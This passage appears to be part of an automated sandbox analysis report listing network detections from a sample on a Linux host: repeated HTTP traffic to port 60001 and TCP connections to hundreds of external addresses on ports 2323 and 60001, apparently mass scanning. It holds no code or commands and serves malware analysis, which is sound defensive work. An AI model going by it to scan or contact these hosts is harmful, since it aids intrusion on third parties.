              Source: unknownNetwork traffic detected: HTTP traffic on port 43564 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 33276 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 37456 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 51214 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 51214 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 52794 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 51618 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43354 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 51618 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 51618 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35978 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 51618 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 56348 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35656 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 56348 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 56348 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35206 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35206 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 48776 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35206 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 48776 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 48776 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35206 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 48776 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35206 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 48776 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 48776 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35206 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 32850 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 53846 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 43140 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 48776 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35206 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 35716 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 58528 -> 60001
              Source: unknownNetwork traffic detected: HTTP traffic on port 48776 -> 60001
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 53.140.253.164:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 105.18.136.120:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 47.199.200.41:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 163.140.24.2:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 72.100.199.25:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 68.140.167.253:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 115.116.75.75:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 76.20.70.153:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 79.43.68.114:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 37.207.197.71:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 38.21.173.197:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 141.51.98.209:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 52.92.182.71:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 53.237.190.244:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 19.209.45.78:2323
              Source: global trafficTCP traffic: 192.168.2.23:34070 -> 83.135.185.112:2323
              Source: global trafficTCP traffic: 192.168.2.23:48182 -> 104.244.72.234:64938
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 221.253.101.114:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 80.139.20.113:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 179.133.22.101:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 71.92.241.20:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 34.202.11.64:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 75.146.12.114:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 52.111.50.136:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 66.249.56.80:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 129.148.253.155:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 64.69.111.65:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 136.62.58.84:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 91.196.92.30:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.1.26.53:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 179.7.133.205:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 50.57.32.114:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 196.37.4.82:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 182.240.115.147:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 104.157.2.41:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 72.139.192.159:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 113.41.82.81:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 116.168.10.136:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 203.175.139.20:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 117.81.190.31:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 98.92.252.192:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 146.5.55.152:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.214.46.234:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 154.113.81.142:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 59.22.167.61:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 67.240.160.66:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 42.15.69.126:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 218.127.75.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 44.79.77.229:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 38.175.214.91:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 209.247.77.95:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 193.0.48.180:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 164.155.157.111:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 91.7.92.129:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 183.223.49.164:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 101.40.149.218:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 191.156.228.136:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 133.218.252.29:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 198.46.140.234:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 82.125.79.157:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 122.159.93.94:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 4.107.241.45:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 35.111.1.254:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 54.253.96.220:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 184.207.18.5:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 118.136.82.156:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.127.114.252:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 67.249.211.161:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 124.172.4.16:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 124.180.219.133:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 104.48.213.54:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 97.253.81.174:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 82.157.184.117:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 183.74.229.95:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.15.150.79:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 154.245.111.9:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 104.20.23.89:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 169.150.29.242:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 137.173.179.25:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 125.190.197.192:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 209.54.79.72:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 187.152.109.126:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 165.17.162.69:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 77.160.157.62:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.115.223.243:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 37.157.13.62:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 47.87.41.215:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 135.74.100.27:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 97.125.9.11:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 149.43.19.21:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 129.220.67.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.107.138.185:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 152.62.163.72:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 121.101.226.122:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 162.172.24.204:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.24.224.54:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 141.162.57.187:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 118.8.148.22:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 166.16.135.196:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 152.250.207.34:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 23.236.26.230:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 85.247.181.104:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 133.98.166.233:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 74.208.31.9:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 20.127.201.152:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 194.250.248.90:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 87.221.211.81:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 77.11.105.244:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 110.196.71.213:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 54.235.34.214:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 164.34.2.113:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 112.101.44.163:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 109.132.142.101:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 105.107.224.107:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 131.126.43.123:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 112.106.78.103:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 117.19.251.194:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 92.121.123.23:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 40.60.150.103:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 32.63.131.9:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 60.71.28.213:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 80.200.28.234:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 107.149.30.29:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 72.131.251.232:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 206.239.117.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.60.181.219:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 139.132.128.75:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 189.136.46.221:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 134.222.111.200:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 90.135.7.219:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 2.137.190.155:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 146.84.100.182:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 130.156.239.43:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 170.30.151.233:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 125.212.53.222:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 109.102.43.12:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 143.64.142.93:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 83.71.172.238:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.235.187.116:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 83.85.154.66:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 71.237.172.91:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 202.231.159.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 123.244.142.184:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 31.124.201.150:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 160.216.8.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 95.111.16.172:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 142.228.82.1:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 63.194.106.55:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 46.142.39.218:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.225.82.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 193.250.115.161:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.65.89.102:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 37.206.128.235:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 151.61.87.96:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.69.15.239:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 210.46.123.184:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 170.218.249.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 131.138.85.106:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 66.101.58.138:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 130.14.122.190:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.2.189.79:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 180.231.149.210:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 190.22.240.126:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 98.125.105.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 86.254.67.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 57.115.164.247:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 130.63.17.80:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 221.245.29.210:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 76.56.12.56:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 20.123.168.198:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 141.235.45.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 42.139.62.201:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 20.39.226.39:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.12.158.100:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 204.44.219.139:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 140.185.162.36:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 174.125.122.106:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 95.90.94.159:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 223.210.238.167:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 44.167.16.105:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 167.82.185.56:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 222.219.220.204:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 146.20.76.140:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 169.242.22.74:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 57.19.193.18:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 138.34.1.61:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 31.228.86.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 42.44.164.156:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 206.208.57.225:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 179.210.171.132:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 96.185.5.245:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 73.58.115.193:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 169.127.66.117:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 179.41.110.76:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 18.239.164.48:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 110.233.190.57:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.91.26.196:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 81.75.13.127:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 79.244.238.232:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 37.63.49.70:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 24.160.233.177:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 34.213.51.225:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 189.168.12.149:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 167.80.90.66:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 118.18.141.36:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 18.25.252.137:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 4.204.155.119:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 87.37.151.48:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 195.208.254.64:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 177.65.107.208:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 94.75.198.108:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 115.75.158.120:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 123.143.60.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.200.160.84:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 147.69.145.3:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 71.218.172.97:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 12.100.118.13:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 80.53.187.76:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 137.146.155.94:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 146.62.112.75:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.232.206.197:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 218.28.228.4:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 36.135.154.54:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 81.35.97.185:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 161.181.223.130:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 149.231.185.161:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 44.75.131.194:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 66.61.152.144:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.210.245.101:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 83.18.245.207:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 93.112.202.71:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 220.254.20.205:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 38.207.46.249:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 223.34.207.3:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 139.213.143.103:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 124.165.17.200:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 93.149.110.153:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 85.153.76.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 104.158.254.151:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 176.45.108.176:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 80.189.185.227:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 187.180.48.43:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 134.43.34.123:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 165.93.100.67:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 223.243.218.114:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 88.96.210.222:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 133.14.209.204:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 142.111.170.9:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 92.71.103.193:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 162.147.90.119:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 211.137.10.192:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 223.232.96.241:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 181.202.151.154:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 219.115.124.139:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 68.73.6.204:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 54.208.85.180:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 198.228.137.193:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 124.200.210.201:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 163.233.18.165:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 162.15.87.155:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 86.76.241.88:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 109.248.179.71:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 51.138.197.64:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 205.115.149.199:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 198.217.244.186:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.87.96.161:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 94.187.250.178:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 63.136.83.166:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 129.26.18.3:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 169.243.225.137:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 159.12.185.140:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 161.125.187.235:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 205.162.21.245:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 173.238.102.46:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 208.98.95.156:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 199.248.138.157:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 152.143.97.109:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 205.114.17.37:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 184.187.33.99:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 70.141.4.246:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 17.45.62.107:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 8.117.195.53:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 47.212.152.195:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 147.102.109.1:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 119.79.96.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 183.119.87.6:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 18.133.50.2:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 211.27.50.27:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 206.44.2.31:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 93.196.141.233:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 9.74.161.245:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 58.29.115.97:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 211.7.34.142:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 203.237.132.77:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 204.232.204.174:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 25.182.187.147:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 114.118.205.35:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 157.187.153.25:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 125.173.44.85:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 196.176.87.55:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 178.174.72.248:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 35.16.219.251:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 4.2.179.168:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 156.187.181.112:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 42.198.181.24:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 113.215.220.35:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 151.38.181.210:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 153.179.86.207:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 213.86.40.169:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 133.176.234.213:60001
              Source: global trafficTCP traffic: 192.168.2.23:34066 -> 187.115.63.64:60001
